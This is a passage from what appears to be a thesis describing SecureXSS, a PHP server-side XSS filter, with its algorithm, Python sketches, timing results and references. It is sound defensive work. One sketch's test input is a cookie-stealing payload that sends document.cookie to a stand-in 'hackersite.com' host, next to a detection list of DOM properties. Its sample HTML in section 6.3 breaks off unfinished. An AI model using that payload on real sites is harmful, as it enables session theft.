If we can successfully strip off the malicious scripts at all the occurrences stated above, we
can protect novice users from malignant XSS.
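As a rough illustration of searching a script value for the properties in Table 5.3, the
following Python sketch normalizes a value and reports which restricted properties it mentions.
It is not the SecureXSS code: the normalization shown (entity decoding, percent-decoding,
whitespace removal, lowercasing) is an assumption, since the exact normalization is not spelled
out in this section, and only a subset of Table 5.3 is listed. The property names are written in
lowercase because JavaScript names are case-sensitive (for example document.cookie); the names
normalize and find_restricted are hypothetical.

```python
import html
import re
from typing import List
from urllib.parse import unquote

# Lowercased subset of the properties listed in Table 5.3.
RESTRICTED_DOM_PROPERTIES = (
    "document.cookie",
    "document.location",
    "location.href",
    "location.replace",
    "window.location",
    "history.go",
    "document.write",
    "document.title",
    "window.status",
    "document.getelementbyid",
    "document.forms",
)


def normalize(value: str) -> str:
    """Assumed normalization: decode HTML entities and percent-escapes,
    drop all whitespace, and lowercase the result."""
    decoded = unquote(html.unescape(value))
    return re.sub(r"\s+", "", decoded).lower()


def find_restricted(value: str) -> List[str]:
    """Return the restricted properties that occur in a script value."""
    normalized = normalize(value)
    return [prop for prop in RESTRICTED_DOM_PROPERTIES if prop in normalized]


attack = "window.open('http://hackersite.com/info.pl?captcha=' + document.cookie)"
print(find_restricted(attack))
print(find_restricted("alert('Welcome')"))
```

A plain substring search after lowercasing errs on the side of stripping too much (it would also
flag harmless text that merely mentions a property name), so a real filter would need a more
careful notion of "access" than this sketch uses.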
CHAPTER 6
IMPLEMENTATION DETAILS AND EXPERIMENTAL RESULTS
As explained in Chapter 4, the solution should not burden the non-technical user (a user without
any technology background) with extra configuration or installation at the browser end. At the
same time, the user should enjoy secure browsing with no loss of functionality. Given the
challenges identified and the solution proposed in Chapter 5, our goal is to implement a
server-side API that is fast, does not weigh down the web server, and places minimal burden on
web developers and administrators.
This part of the thesis covers the procedure of the solution, its implementation details, its
working, the results, and finally a comparison of our solution with other existing solutions
(with respect to time, not with respect to functionality).
6.1 Procedure
The abstract view of the solution given in Chapter 5 may not be enough for the reader to
understand it. For the reader's benefit, the core of the solution is presented in this section.
Algorithm 6.1 (High-level algorithm explaining the procedure of SecureXSS)
Input: Input given by the user (can be plain text, HTML or script)
Output: XSS-free user input (filtered user message)
1. Generate the DOM for all the tags in the user-given input.
2. Parse for all occurrences of script attributes (the Type 2 attributes explained in
Chapter 5).
3. For each occurrence found in step 2, normalize the value of the attribute and validate it.
4. Restrict the value of the attribute for Type 1 attributes, as defined in Table 5.2.
5. Find all occurrences of the script tag, remove the src attribute if set, and normalize and
validate the inner text of the script tag.
6. Find all occurrences of the style attribute, and normalize and validate it.
7. Find all occurrences of the style tag, and normalize and validate its inner text.
8. Find all occurrences of the form tag, remove the action attribute if set, and strip off the
inner text of the form tag.
9. Remove the attributes that failed validation in steps 3 through 8.
10. Return the XSS-free output.
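The flow of Algorithm 6.1 can be sketched as below for steps 2, 3, 5, 6, 7, 9 and 10. This is an
illustrative Python outline built on the standard html.parser module, not the PHP implementation
of SecureXSS. Several points are assumptions: "script attributes" are taken to be event handlers
whose names start with "on" (Table 5.1 is not reproduced here), step 4 is omitted because it
depends on Table 5.2, step 8 is left out for brevity, and looks_malicious is a stand-in validator
that checks a single property. The names SketchFilter and filter_post are hypothetical.

```python
from html import escape
from html.parser import HTMLParser


def looks_malicious(value):
    """Stand-in validator (assumption): flags a single Table 5.3 property."""
    return "document.cookie" in "".join(value.split()).lower()


class SketchFilter(HTMLParser):
    """Walks the tags of a user post and rebuilds it without failing parts."""

    def __init__(self, is_malicious=looks_malicious):
        super().__init__(convert_charrefs=False)
        self.is_malicious = is_malicious
        self.out = []
        self.in_code_tag = False  # True inside a script or style tag

    def _open(self, tag, attrs, end=">"):
        kept = []
        for name, value in attrs:
            if tag == "script" and name == "src":
                continue  # step 5: remove src from script tags
            # Assumption: script attributes are event handlers (on*).
            scripted = name.startswith("on") or name == "style"
            if scripted and self.is_malicious(value or ""):
                continue  # steps 2, 3, 6, 9: drop attributes failing validation
            kept.append(name if value is None
                        else '%s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<" + " ".join([tag] + kept) + end)

    def handle_starttag(self, tag, attrs):
        self._open(tag, attrs)
        self.in_code_tag = tag in ("script", "style")

    def handle_startendtag(self, tag, attrs):
        self._open(tag, attrs, end=" />")

    def handle_endtag(self, tag):
        self.in_code_tag = False
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        # Steps 5 and 7: inner text of script and style tags is validated too.
        if not (self.in_code_tag and self.is_malicious(data)):
            self.out.append(data)

    def handle_entityref(self, name):
        self.out.append("&%s;" % name)

    def handle_charref(self, name):
        self.out.append("&#%s;" % name)


def filter_post(post, is_malicious=looks_malicious):
    parser = SketchFilter(is_malicious)
    parser.feed(post)
    parser.close()
    return "".join(parser.out)  # step 10: return the filtered post


print(filter_post('<b onclick="alert(1)" onmouseover="x=document.cookie">Hi</b>'))
```

Passing the validator in as a parameter keeps the tree walk independent of the rule set, so a
fuller check against Table 5.3 could be substituted without changing the walk.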
6.2 Implementation Details
With the solution understood in detail from the procedure above, this section presents the
implementation details of the SecureXSS API. SecureXSS is a server-side XSS filtering API,
developed in PHP5. To generate the DOM for the user-given input, we use Simple HTML DOM Parser
[HDP], an open source API written in PHP.
The current version of SecureXSS is a model API, developed in PHP5 to ease the web developer's
job and thereby provide secure browsing for innocent users. This model was developed to prove
the correctness of the solution. Interested web developers are free to port this solution to
other server-side technologies (such as ASP and JSP).
As stated above, our implementation uses Simple HTML DOM Parser (since we felt it works better
than other DOM parsers) to parse the user input or given message and generate its DOM. The
current implementation of the API is tied to Simple HTML DOM Parser. Users who wish to use their
own DOM parser, or any other available DOM parser, may have to rewrite the API for their usage.
Once the DOM tree is generated for all the tags in the user-given input, Steps 2 to 9 of the
above procedure remain the same.
6.3 Working of SecureXSS
SecureXSS is a server-side XSS filtering API: given possibly malicious user input, it validates
the input and returns only the non-malicious content. The usage of the SecureXSS API is
illustrated in Figure 6.1. When a user sends a POST request to the web server, the server
instantiates the API and forwards the user input to it. The API validates the input, strips all
malicious content, and returns the non-malicious content to the server, which then processes the
operation the user requested.
Figure 6.1: Server-side XSS Filtering API
The steps shown in Figure 6.1 are explained below:
1. The client sends a POST request to the web server.
2. The web server sends the request to the SecureXSS API.
3. SecureXSS sends back the non-malicious user request.
4. The web server stores the user post in the database, or otherwise processes the request.
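The request flow in the steps above amounts to filtering a post before anything else touches it.
A minimal Python sketch of that ordering follows; handle_post, toy_filter and the in-memory list
standing in for the database are all hypothetical, and toy_filter is only a placeholder for the
real filter, not a description of how SecureXSS works.

```python
from typing import Callable, List


def handle_post(message: str,
                sanitize: Callable[[str], str],
                database: List[str]) -> str:
    """Steps 2 to 4 of Figure 6.1: filter the post first, then store it."""
    clean = sanitize(message)  # steps 2 and 3: round trip through the filter
    database.append(clean)     # step 4: only the filtered post is stored
    return clean


def toy_filter(message: str) -> str:
    """Placeholder filter (assumption): removes one restricted property."""
    return message.replace("document.cookie", "")


posts: List[str] = []
handle_post("Nice article! <script>x=document.cookie</script>", toy_filter, posts)
print(posts)
```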
Here we will see working of the solution on the sample html shown below.
document.write("
6.4 Results
Security mechanisms cannot be comprehensively tested because it is impossible to prove a
negative. In other words, there is no way of knowing whether the set of all publicly known
attacks, which can be incorporated into test cases, is equal to the set of all possible attacks.
A subset (200 vectors) of all publicly known XSS attacks, gathered from recognized knowledge
bases [RSN] [W3S], has been tested with 100% effectiveness (shown in Appendix II). Of the 200
vectors we collected, 100 are malicious and the other 100 are non-malicious (as explained in
Chapter 4).
Running time was also an important consideration, given the importance of availability and
response time for enterprise applications. For the timing tests, we collected a set of 350 web
pages from popular sites such as http://news.yahoo.com/, http://news.google.com/ and
http://msdn.microsoft.com/. The results of our timing tests (overhead) are shown in Table 6.1.
Table 6.1: SecureXSS timing test (overhead) results
Size of HTML (KB) | Average Execution Time (Sec)
10-30 | 0.095048352
31-60 | 0.182305614
61-90 | 0.234215016
91-120 | 0.269700872
The results above are plotted in Figure 6.2, with the size of the HTML on the X-axis and the
execution time on the Y-axis. The results were measured on an Intel Core 2 Duo 3.0 GHz system
with 2 GB RAM, running Windows XP Professional SP2 and the XAMPP web server.
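To make the figures in Table 6.1 easier to compare, the overhead can be expressed per KB of
HTML. The Python sketch below does this arithmetic under one assumption that is not in the
measurements themselves: the midpoint of each size range is treated as a typical page size for
that range. The name ms_per_kb is hypothetical.

```python
# (low KB, high KB, average execution time in seconds), copied from Table 6.1
TIMINGS = [
    (10, 30, 0.095048352),
    (31, 60, 0.182305614),
    (61, 90, 0.234215016),
    (91, 120, 0.269700872),
]


def ms_per_kb(low_kb, high_kb, seconds):
    """Overhead per KB, assuming the range midpoint is a typical page size."""
    midpoint = (low_kb + high_kb) / 2
    return 1000 * seconds / midpoint


per_kb = [ms_per_kb(*row) for row in TIMINGS]
for (low, high, _), cost in zip(TIMINGS, per_kb):
    print("%d-%d KB: about %.2f ms per KB" % (low, high, cost))
```

Under the midpoint assumption the per-KB figure falls from about 4.75 ms for the smallest range
to about 2.56 ms for the largest, that is, the measured overhead grows more slowly than the page
size.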
Figure 6.2: SecureXSS overhead on the server
The results are also compared with another popular XSS API, HTML Purifier; the comparison is
shown in Appendix III. As HTML Purifier is itself compared with all the other solutions in [HTP],
we can say that SecureXSS performs very well compared with the existing server-side XSS
filtering APIs.
CHAPTER 7
CONCLUSIONS
The Internet has revolutionized different aspects of human life, such as the way people
communicate and do business. But trust in web applications and the user experience are not fully
satisfactory, owing to the plethora of security breaches that occur frequently in many critical
applications such as banking and that threaten the privacy of legitimate customers' details.
This project helps increase the security of web applications, thereby enhancing end customers'
trust in these applications and providing a better experience online.
This project addresses the most important issue faced by present-day web users, the Cross-site
Scripting (XSS) attack. The main goal of this project was to build a server-side XSS filtering
API that differentiates simple script from malevolent XSS, with execution time also considered
as one of the factors. To this end, we worked on differentiating simple script from XSS (as no
existing server-side XSS API differentiates simple script from XSS) and proposed an approach for
doing so. We also developed an open source server-side XSS filtering model API called SecureXSS
(pronounced "Secure Excess"), which differentiates simple script from malignant XSS.
Scope for Future Work
The developed model API works well in stripping out genuine XSS (including XSS worms and
viruses); however, it is restricted to PHP, as it is developed in PHP. The same logic can be
extended to the other server-side scripting languages (such as ASP and JSP), so that all classes
of web developers can use the solution.
REFERENCES
[OWA] OWASP Top 10, The Ten Most Critical Web Application Security vulnerabilities, http://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf, Last Accessed: July 7, 2009.
[CER] CERT Advisory CA-2000-02: Malicious HTML Tags Embedded in Client Web Requests, February 2000.
[XSS] Cross-site Scripting (XSS), www.owasp.org/index.php/Cross_site_scripting, Last Accessed: July 7, 2009.
[USC] US-CERT. eBay contains a cross-site scripting vulnerability. http://www.kb.cert.org/vuls/id/808921, 2006.
[KLE] Amit Klein. DOM Based Cross Site Scripting or XSS of the Third Kind. http://www.webappsec.org/projects/articles/071105.shtml, 2005.
[PEW] Pew Internet & American Life Project Report: Spam and Phishing. http://www.pewinternet.org, 2005.
[STA] Ed Stansel. Don’t Get Caught by Online Phishers Angling for Account information. Florida Times-Union, 1997.
[OLL] Gunter Ollmann. The Phishing Guide, Understanding & Preventing Phishing Attacks. NGSSoftware Insight Security Research, 2004.
[RRO] J.Martin, Justus Winter. RequestRodeo: Client Side Protection against Session Riding. In OWASPAppSec2006Europe, 2006.
[ROB] Robert Auger. The Cross-Site Request Forgery (CSRF/XSRF) FAQ. http://www.cgisecurity.com/csrf-faq.html. Apr, 2008.
[CSRF] Cross Site Request Forgery, An introduction to a common web application weakness. Jesse Burns 2007.
[JEG] Jeremiah Grossman, Robert “RSnake” Hansen, Petko “pdp” D. Petkov, Anton Rager, Seth Fogie, XSS Attacks Cross-site Scripting Exploits and Defence, Syngress Publishing, Inc., ISBN-13: 978-1-59749-154-9.
[BBC] BBCode, http://en.wikipedia.org/wiki/BBCode, Last Accessed: July 7, 2009.
[WIT] Wikitext, http://en.wikipedia.org/wiki/Wikitext, Last Accessed: July 7, 2009.
[MAD] Markdown, http://daringfireball.net/projects/markdown/, Last Accessed: July 7, 2009.
[TEX] Textile, http://textism.com/tools/textile/, Last Accessed: July 7, 2009.
[STT] Strip_tags – Manual, http://php.net/manual/en/function.strip-tags.php, Last Accessed: July 8, 2009.
[PIF] PHP Input Filter, www.phpclasses.org/browse/package/2189.html#download, Last Accessed: July 8, 2009.
[HTS] HTML_Safe, http://pear.php.net/package/HTML_Safe/, Last Accessed: July 8, 2009.
[KSS] Kses, http://sourceforge.net/projects/kses/, Last Accessed: July 8, 2009.
[HTL] htmLawed, www.bioinformatics.org/phplabware/internal_utilities/htmLawed/index.php, Last Accessed: July 8, 2009.
[SHC] Safe HTML Checker, http://simonwillison.net/2003/Feb/23/safeHtmlChecker/, Last Accessed: July 8, 2009.
[HTP] HTML Purifier, http://htmlpurifier.org/, Last Accessed: July 8, 2009.
[ANT] Dabirsiaghi, Arshan, Towards Automated Malicious Code Detection and Removal on the Web, Open Web Application Security Project, Aspect Security, Inc., 2007.
[GEL] Security issues in Kses - Geeklog, http://www.geeklog.net/article.php/kses, Last Accessed: July 16, 2009.
[HTM] htmLawed, http://drupal.org/project/htmLawed, Last Accessed: July 16, 2009.
[HDP] PHP Simple HTML DOM Parser, http://simplehtmldom.sourceforge.net/, Last Accessed: July 20, 2009.
[RSN] XSS (Cross-site Scripting) Cheat Sheet, http://ha.ckers.org/xss.html, Last Accessed: July 24, 2009.
[W3S] W3Schools, http://www.w3schools.com, Last Accessed: July 24, 2009.
APPENDIX I
OWASP THE TEN MOST CRITICAL WEB APPLICATION SECURITY VULNERABILITIES
The Open Web Application Security Project (OWASP) (www.owasp.org) is a worldwide
free and open community focused on improving the security of application software. OWASP’s
mission is to make application security visible, so that people and organizations can make
informed decisions about true application security risks.
The primary aim of the OWASP Top 10 is to educate developers, designers, architects
and organizations about the consequences of the most common web application security
vulnerabilities. This is based on the MITRE Vulnerability trends (explained in
http://cwe.mitre.org/documents/vuln-trends/index.html), from which the top ten vulnerabilities
are distilled. The following are the ranks of the vulnerabilities:
Figure 1: MITRE data on Top 10 web application vulnerabilities for 2006
[OWA] discusses each vulnerability in detail, along with the protection measures to be taken to
protect the application from these vulnerabilities. However, it is assumed that the most common
vulnerabilities, such as unvalidated input, buffer overflows, integer overflows and format
string issues, denial of service, and insecure configuration management, are taken care of in
the web applications. The following table provides a brief discussion of the top 10 web
application vulnerabilities listed in the OWASP Top 10 2007 [OWA].
Table 1: OWASP Top 10 Web Application Vulnerabilities
Vulnerability Description
A1 – Cross Site Scripting (XSS)
XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim’s browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.
A2 – Injection Flaws
Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker’s hostile data tricks the interpreter into executing unintended commands or changing data.
A3 – Malicious File Execution
Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile